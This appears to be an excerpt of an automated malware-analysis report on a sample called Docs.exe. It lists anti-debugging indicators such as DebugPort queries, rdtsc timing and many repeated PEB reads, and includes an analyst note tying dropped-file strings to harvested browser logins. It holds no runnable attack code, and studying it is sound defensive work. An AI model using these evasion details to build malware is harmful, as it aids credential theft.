Note: every 'VMware20,11696428655' hit above is in UQ63g7r-.7.dr, a file dropped by process 7 (tzutil.exe). The surrounding text (bank, brokerage and webmail host names, 'Transaction Password' form titles) reads like harvested browser-login records rather than VM-detection logic in the sample, so these lines support the credential-theft findings more than the evasion one. Likewise 'Hyper-V RAW' is the name of a Winsock protocol-catalog entry that appears in the memory of any process that initialises Winsock, including the benign firefox.exe process listed here.
Source: C:\Users\user\Desktop\Docs.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Docs.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\tzutil.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_015E096E rdtsc
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_00417B63 LdrLoadDll
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_01674164 mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_015A6154 mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_0159C156 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_01634144 mov eax/ecx, dword ptr fs:[00000030h] (5 reads: 4 eax, 1 ecx)
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_01638158 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_0164E10E mov eax/ecx, dword ptr fs:[00000030h] (10 reads: 6 eax, 4 ecx)
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_01660115 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_015D0124 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_0164A118 mov eax/ecx, dword ptr fs:[00000030h] (4 reads: 3 eax, 1 ecx)
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_016761E5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_016661C3 mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_015D01F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_0161E1D0 mov eax/ecx, dword ptr fs:[00000030h] (5 reads: 4 eax, 1 ecx)
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_0159A197 mov eax, dword ptr fs:[00000030h] (3 reads)
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_015E0185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_01644180 mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_0165C188 mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_0162019F mov eax, dword ptr fs:[00000030h] (4 reads)
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_015A2050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_015CC073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_01626050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_015BE016 mov eax, dword ptr fs:[00000030h] (4 reads)
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_01636030 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_01624000 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_01642000 mov eax, dword ptr fs:[00000030h] (8 reads)
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_0159A020 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_0159C020 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_016260E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_0159C0F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_015E20F0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_015A80E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_0159A0E3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_016220DE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_016380A8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_015A208A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_016660B8 mov eax/ecx, dword ptr fs:[00000030h] (2 reads: 1 eax, 1 ecx)
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_015980A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_0164437C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_0167634F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Docs.exe | Code function: 3_2_01622349 mov eax, dword ptr fs:[00000030h] (11 reads)
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01622349 mov eax, dword ptr fs:[00000030h]3_2_01622349
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01622349 mov eax, dword ptr fs:[00000030h]3_2_01622349
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01622349 mov eax, dword ptr fs:[00000030h]3_2_01622349
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01622349 mov eax, dword ptr fs:[00000030h]3_2_01622349
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0166A352 mov eax, dword ptr fs:[00000030h]3_2_0166A352
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01648350 mov ecx, dword ptr fs:[00000030h]3_2_01648350
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0162035C mov eax, dword ptr fs:[00000030h]3_2_0162035C
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0162035C mov eax, dword ptr fs:[00000030h]3_2_0162035C
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0162035C mov eax, dword ptr fs:[00000030h]3_2_0162035C
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0162035C mov ecx, dword ptr fs:[00000030h]3_2_0162035C
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0162035C mov eax, dword ptr fs:[00000030h]3_2_0162035C
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0162035C mov eax, dword ptr fs:[00000030h]3_2_0162035C
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01678324 mov eax, dword ptr fs:[00000030h]3_2_01678324
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01678324 mov ecx, dword ptr fs:[00000030h]3_2_01678324
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01678324 mov eax, dword ptr fs:[00000030h]3_2_01678324
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01678324 mov eax, dword ptr fs:[00000030h]3_2_01678324
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0159C310 mov ecx, dword ptr fs:[00000030h]3_2_0159C310
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015C0310 mov ecx, dword ptr fs:[00000030h]3_2_015C0310
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DA30B mov eax, dword ptr fs:[00000030h]3_2_015DA30B
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DA30B mov eax, dword ptr fs:[00000030h]3_2_015DA30B
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DA30B mov eax, dword ptr fs:[00000030h]3_2_015DA30B
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015AA3C0 mov eax, dword ptr fs:[00000030h]3_2_015AA3C0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015AA3C0 mov eax, dword ptr fs:[00000030h]3_2_015AA3C0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015AA3C0 mov eax, dword ptr fs:[00000030h]3_2_015AA3C0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015AA3C0 mov eax, dword ptr fs:[00000030h]3_2_015AA3C0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015AA3C0 mov eax, dword ptr fs:[00000030h]3_2_015AA3C0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015AA3C0 mov eax, dword ptr fs:[00000030h]3_2_015AA3C0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A83C0 mov eax, dword ptr fs:[00000030h]3_2_015A83C0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A83C0 mov eax, dword ptr fs:[00000030h]3_2_015A83C0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A83C0 mov eax, dword ptr fs:[00000030h]3_2_015A83C0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A83C0 mov eax, dword ptr fs:[00000030h]3_2_015A83C0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D63FF mov eax, dword ptr fs:[00000030h]3_2_015D63FF
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016263C0 mov eax, dword ptr fs:[00000030h]3_2_016263C0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0165C3CD mov eax, dword ptr fs:[00000030h]3_2_0165C3CD
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015BE3F0 mov eax, dword ptr fs:[00000030h]3_2_015BE3F0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015BE3F0 mov eax, dword ptr fs:[00000030h]3_2_015BE3F0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015BE3F0 mov eax, dword ptr fs:[00000030h]3_2_015BE3F0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016443D4 mov eax, dword ptr fs:[00000030h]3_2_016443D4
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016443D4 mov eax, dword ptr fs:[00000030h]3_2_016443D4
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B03E9 mov eax, dword ptr fs:[00000030h]3_2_015B03E9
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B03E9 mov eax, dword ptr fs:[00000030h]3_2_015B03E9
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B03E9 mov eax, dword ptr fs:[00000030h]3_2_015B03E9
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B03E9 mov eax, dword ptr fs:[00000030h]3_2_015B03E9
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B03E9 mov eax, dword ptr fs:[00000030h]3_2_015B03E9
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B03E9 mov eax, dword ptr fs:[00000030h]3_2_015B03E9
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B03E9 mov eax, dword ptr fs:[00000030h]3_2_015B03E9
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B03E9 mov eax, dword ptr fs:[00000030h]3_2_015B03E9
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0164E3DB mov eax, dword ptr fs:[00000030h]3_2_0164E3DB
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0164E3DB mov eax, dword ptr fs:[00000030h]3_2_0164E3DB
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0164E3DB mov ecx, dword ptr fs:[00000030h]3_2_0164E3DB
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0164E3DB mov eax, dword ptr fs:[00000030h]3_2_0164E3DB
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01598397 mov eax, dword ptr fs:[00000030h]3_2_01598397
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01598397 mov eax, dword ptr fs:[00000030h]3_2_01598397
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01598397 mov eax, dword ptr fs:[00000030h]3_2_01598397
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0159E388 mov eax, dword ptr fs:[00000030h]3_2_0159E388
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0159E388 mov eax, dword ptr fs:[00000030h]3_2_0159E388
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0159E388 mov eax, dword ptr fs:[00000030h]3_2_0159E388
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015C438F mov eax, dword ptr fs:[00000030h]3_2_015C438F
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015C438F mov eax, dword ptr fs:[00000030h]3_2_015C438F
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A6259 mov eax, dword ptr fs:[00000030h]3_2_015A6259
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0159A250 mov eax, dword ptr fs:[00000030h]3_2_0159A250
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01650274 mov eax, dword ptr fs:[00000030h]3_2_01650274
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01650274 mov eax, dword ptr fs:[00000030h]3_2_01650274
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01650274 mov eax, dword ptr fs:[00000030h]3_2_01650274
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01650274 mov eax, dword ptr fs:[00000030h]3_2_01650274
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01650274 mov eax, dword ptr fs:[00000030h]3_2_01650274
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01650274 mov eax, dword ptr fs:[00000030h]3_2_01650274
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01650274 mov eax, dword ptr fs:[00000030h]3_2_01650274
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01650274 mov eax, dword ptr fs:[00000030h]3_2_01650274
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01650274 mov eax, dword ptr fs:[00000030h]3_2_01650274
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01650274 mov eax, dword ptr fs:[00000030h]3_2_01650274
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01650274 mov eax, dword ptr fs:[00000030h]3_2_01650274
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01650274 mov eax, dword ptr fs:[00000030h]3_2_01650274
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01628243 mov eax, dword ptr fs:[00000030h]3_2_01628243
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01628243 mov ecx, dword ptr fs:[00000030h]3_2_01628243
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0159826B mov eax, dword ptr fs:[00000030h]3_2_0159826B
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0165A250 mov eax, dword ptr fs:[00000030h]3_2_0165A250
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0165A250 mov eax, dword ptr fs:[00000030h]3_2_0165A250
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A4260 mov eax, dword ptr fs:[00000030h]3_2_015A4260
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A4260 mov eax, dword ptr fs:[00000030h]3_2_015A4260
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A4260 mov eax, dword ptr fs:[00000030h]3_2_015A4260
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0167625D mov eax, dword ptr fs:[00000030h]3_2_0167625D
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0159823B mov eax, dword ptr fs:[00000030h]3_2_0159823B
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015AA2C3 mov eax, dword ptr fs:[00000030h]3_2_015AA2C3
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015AA2C3 mov eax, dword ptr fs:[00000030h]3_2_015AA2C3
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015AA2C3 mov eax, dword ptr fs:[00000030h]3_2_015AA2C3
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015AA2C3 mov eax, dword ptr fs:[00000030h]3_2_015AA2C3
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015AA2C3 mov eax, dword ptr fs:[00000030h]3_2_015AA2C3
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016762D6 mov eax, dword ptr fs:[00000030h]3_2_016762D6
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B02E1 mov eax, dword ptr fs:[00000030h]3_2_015B02E1
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B02E1 mov eax, dword ptr fs:[00000030h]3_2_015B02E1
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B02E1 mov eax, dword ptr fs:[00000030h]3_2_015B02E1
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016362A0 mov eax, dword ptr fs:[00000030h]3_2_016362A0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016362A0 mov ecx, dword ptr fs:[00000030h]3_2_016362A0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016362A0 mov eax, dword ptr fs:[00000030h]3_2_016362A0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016362A0 mov eax, dword ptr fs:[00000030h]3_2_016362A0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016362A0 mov eax, dword ptr fs:[00000030h]3_2_016362A0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016362A0 mov eax, dword ptr fs:[00000030h]3_2_016362A0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DE284 mov eax, dword ptr fs:[00000030h]3_2_015DE284
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DE284 mov eax, dword ptr fs:[00000030h]3_2_015DE284
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01620283 mov eax, dword ptr fs:[00000030h]3_2_01620283
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01620283 mov eax, dword ptr fs:[00000030h]3_2_01620283
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01620283 mov eax, dword ptr fs:[00000030h]3_2_01620283
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B02A0 mov eax, dword ptr fs:[00000030h]3_2_015B02A0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B02A0 mov eax, dword ptr fs:[00000030h]3_2_015B02A0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A8550 mov eax, dword ptr fs:[00000030h]3_2_015A8550
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A8550 mov eax, dword ptr fs:[00000030h]3_2_015A8550
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D656A mov eax, dword ptr fs:[00000030h]3_2_015D656A
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D656A mov eax, dword ptr fs:[00000030h]3_2_015D656A
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D656A mov eax, dword ptr fs:[00000030h]3_2_015D656A
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CE53E mov eax, dword ptr fs:[00000030h]3_2_015CE53E
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CE53E mov eax, dword ptr fs:[00000030h]3_2_015CE53E
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CE53E mov eax, dword ptr fs:[00000030h]3_2_015CE53E
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CE53E mov eax, dword ptr fs:[00000030h]3_2_015CE53E
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CE53E mov eax, dword ptr fs:[00000030h]3_2_015CE53E
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01636500 mov eax, dword ptr fs:[00000030h]3_2_01636500
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01674500 mov eax, dword ptr fs:[00000030h]3_2_01674500
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01674500 mov eax, dword ptr fs:[00000030h]3_2_01674500
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01674500 mov eax, dword ptr fs:[00000030h]3_2_01674500
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01674500 mov eax, dword ptr fs:[00000030h]3_2_01674500
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01674500 mov eax, dword ptr fs:[00000030h]3_2_01674500
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01674500 mov eax, dword ptr fs:[00000030h]3_2_01674500
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01674500 mov eax, dword ptr fs:[00000030h]3_2_01674500
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0535 mov eax, dword ptr fs:[00000030h]3_2_015B0535
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0535 mov eax, dword ptr fs:[00000030h]3_2_015B0535
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0535 mov eax, dword ptr fs:[00000030h]3_2_015B0535
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0535 mov eax, dword ptr fs:[00000030h]3_2_015B0535
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0535 mov eax, dword ptr fs:[00000030h]3_2_015B0535
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0535 mov eax, dword ptr fs:[00000030h]3_2_015B0535
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A65D0 mov eax, dword ptr fs:[00000030h]3_2_015A65D0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DA5D0 mov eax, dword ptr fs:[00000030h]3_2_015DA5D0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DA5D0 mov eax, dword ptr fs:[00000030h]3_2_015DA5D0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DE5CF mov eax, dword ptr fs:[00000030h]3_2_015DE5CF
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DE5CF mov eax, dword ptr fs:[00000030h]3_2_015DE5CF
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DC5ED mov eax, dword ptr fs:[00000030h]3_2_015DC5ED
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DC5ED mov eax, dword ptr fs:[00000030h]3_2_015DC5ED
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A25E0 mov eax, dword ptr fs:[00000030h]3_2_015A25E0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CE5E7 mov eax, dword ptr fs:[00000030h]3_2_015CE5E7
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CE5E7 mov eax, dword ptr fs:[00000030h]3_2_015CE5E7
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CE5E7 mov eax, dword ptr fs:[00000030h]3_2_015CE5E7
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CE5E7 mov eax, dword ptr fs:[00000030h]3_2_015CE5E7
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CE5E7 mov eax, dword ptr fs:[00000030h]3_2_015CE5E7
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CE5E7 mov eax, dword ptr fs:[00000030h]3_2_015CE5E7
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CE5E7 mov eax, dword ptr fs:[00000030h]3_2_015CE5E7
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CE5E7 mov eax, dword ptr fs:[00000030h]3_2_015CE5E7
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DE59C mov eax, dword ptr fs:[00000030h]3_2_015DE59C
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016205A7 mov eax, dword ptr fs:[00000030h]3_2_016205A7
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016205A7 mov eax, dword ptr fs:[00000030h]3_2_016205A7
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_016205A7 mov eax, dword ptr fs:[00000030h]3_2_016205A7
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D4588 mov eax, dword ptr fs:[00000030h]3_2_015D4588
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A2582 mov eax, dword ptr fs:[00000030h]3_2_015A2582
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A2582 mov ecx, dword ptr fs:[00000030h]3_2_015A2582
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015C45B1 mov eax, dword ptr fs:[00000030h]3_2_015C45B1
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015C45B1 mov eax, dword ptr fs:[00000030h]3_2_015C45B1
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0162C460 mov ecx, dword ptr fs:[00000030h]3_2_0162C460
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0159645D mov eax, dword ptr fs:[00000030h]3_2_0159645D
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015C245A mov eax, dword ptr fs:[00000030h]3_2_015C245A
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DE443 mov eax, dword ptr fs:[00000030h]3_2_015DE443
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DE443 mov eax, dword ptr fs:[00000030h]3_2_015DE443
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DE443 mov eax, dword ptr fs:[00000030h]3_2_015DE443
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DE443 mov eax, dword ptr fs:[00000030h]3_2_015DE443
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DE443 mov eax, dword ptr fs:[00000030h]3_2_015DE443
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DE443 mov eax, dword ptr fs:[00000030h]3_2_015DE443
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DE443 mov eax, dword ptr fs:[00000030h]3_2_015DE443
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DE443 mov eax, dword ptr fs:[00000030h]3_2_015DE443
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CA470 mov eax, dword ptr fs:[00000030h]3_2_015CA470
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CA470 mov eax, dword ptr fs:[00000030h]3_2_015CA470
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CA470 mov eax, dword ptr fs:[00000030h]3_2_015CA470
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0165A456 mov eax, dword ptr fs:[00000030h]3_2_0165A456
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01626420 mov eax, dword ptr fs:[00000030h]3_2_01626420
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01626420 mov eax, dword ptr fs:[00000030h]3_2_01626420
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01626420 mov eax, dword ptr fs:[00000030h]3_2_01626420
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01626420 mov eax, dword ptr fs:[00000030h]3_2_01626420
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01626420 mov eax, dword ptr fs:[00000030h]3_2_01626420
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01626420 mov eax, dword ptr fs:[00000030h]3_2_01626420
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01626420 mov eax, dword ptr fs:[00000030h]3_2_01626420
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D8402 mov eax, dword ptr fs:[00000030h]3_2_015D8402
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D8402 mov eax, dword ptr fs:[00000030h]3_2_015D8402
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D8402 mov eax, dword ptr fs:[00000030h]3_2_015D8402
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DA430 mov eax, dword ptr fs:[00000030h]3_2_015DA430
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0159E420 mov eax, dword ptr fs:[00000030h]3_2_0159E420
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0159E420 mov eax, dword ptr fs:[00000030h]3_2_0159E420
